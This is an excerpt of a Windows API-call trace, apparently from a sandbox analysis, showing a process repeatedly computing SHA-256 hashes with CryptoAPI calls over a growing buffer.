	[0226.091] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.091] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.139] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.139] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0226.139] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b708
	[0226.140] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b708, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b708, pdwDataLen=0x1284a8) returned 1
	[0226.140] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.140] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.140] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.140] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.140] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0226.140] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b730
	[0226.140] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231b730, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b730, pdwDataLen=0x1284a8) returned 1
	[0226.140] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.140] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.140] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.140] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.140] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0226.141] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b758
	[0226.141] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b758, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b758, pdwDataLen=0x1284a8) returned 1
	[0226.141] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.141] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.141] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.141] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.141] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0226.141] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b780
	[0226.141] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231b780, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b780, pdwDataLen=0x1284a8) returned 1
	[0226.141] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.141] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.141] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.141] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.141] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0226.142] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b7a8
	[0226.142] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b7a8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b7a8, pdwDataLen=0x1284a8) returned 1
	[0226.142] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.142] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.142] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.142] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.142] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0226.142] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b7d0
	[0226.142] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231b7d0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b7d0, pdwDataLen=0x1284a8) returned 1
	[0226.142] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.142] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.142] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.142] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.142] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0226.142] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b7f8
	[0226.143] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b7f8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b7f8, pdwDataLen=0x1284a8) returned 1
	[0226.143] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.143] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.143] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.143] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.143] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0226.143] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b820
	[0226.143] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231b820, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b820, pdwDataLen=0x1284a8) returned 1
	[0226.143] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.143] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.143] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.143] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.143] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0226.143] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b848
	[0226.144] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b848, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b848, pdwDataLen=0x1284a8) returned 1
	[0226.144] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.144] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.144] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.144] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.144] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0226.144] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b870
	[0226.144] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231b870, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b870, pdwDataLen=0x1284a8) returned 1
	[0226.144] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.144] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.144] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.144] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.144] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0226.144] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.144] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b898
	[0226.145] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b898, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b898, pdwDataLen=0x1284a8) returned 1
	[0226.145] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.145] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.145] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.145] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.145] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0226.145] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b8c0
	[0226.145] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231b8c0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b8c0, pdwDataLen=0x1284a8) returned 1
	[0226.145] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.145] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.145] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.145] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.146] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0226.146] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b8e8
	[0226.146] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b8e8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b8e8, pdwDataLen=0x1284a8) returned 1
	[0226.146] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.146] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.146] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.146] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.146] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0226.146] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.146] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b910
	[0226.146] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231b910, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b910, pdwDataLen=0x1284a8) returned 1
	[0226.146] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.146] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.146] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.147] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.147] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0226.147] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b938
	[0226.147] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b938, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b938, pdwDataLen=0x1284a8) returned 1
	[0226.147] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.147] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.147] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.147] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.147] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0226.147] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b960
	[0226.147] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231b960, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b960, pdwDataLen=0x1284a8) returned 1
	[0226.147] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.147] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.147] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.148] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.148] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0226.148] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b988
	[0226.148] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b988, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b988, pdwDataLen=0x1284a8) returned 1
	[0226.148] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.148] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.148] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.148] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.148] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0226.148] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.148] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b9b0
	[0226.148] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231b9b0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b9b0, pdwDataLen=0x1284a8) returned 1
	[0226.148] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.148] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.148] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.149] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.149] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0226.149] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.149] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b9d8
	[0226.149] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b9d8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b9d8, pdwDataLen=0x1284a8) returned 1
	[0226.149] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.149] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.149] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.149] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.149] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0226.149] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.149] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ba00
	[0226.149] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ba00, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231ba00, pdwDataLen=0x1284a8) returned 1
	[0226.149] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.149] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.149] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.150] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.150] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0226.150] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.150] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ba28
	[0226.150] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231ba28, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231ba28, pdwDataLen=0x1284a8) returned 1
	[0226.150] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.150] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.150] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.150] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.150] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0226.150] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.150] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ba50
	[0226.150] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ba50, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231ba50, pdwDataLen=0x1284a8) returned 1
	[0226.150] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.150] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.150] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.151] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.151] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0226.151] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.151] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ba78
	[0226.151] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231ba78, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231ba78, pdwDataLen=0x1284a8) returned 1
	[0226.151] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.151] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.151] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.151] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.151] CryptHashData (hHash=0x22b6a00, pbData=0x2761c48, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0226.151] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.151] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231baa0
	[0226.151] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231baa0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231baa0, pdwDataLen=0x1284a8) returned 1
	[0226.151] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0226.151] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.151] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.152] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.152] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0226.152] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.152] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231bac8
	[0226.152] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231bac8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231bac8, pdwDataLen=0x1284a8) returned 1
	[0226.152] CryptDestroyHash (hHash=0x22b69c0) returned 1
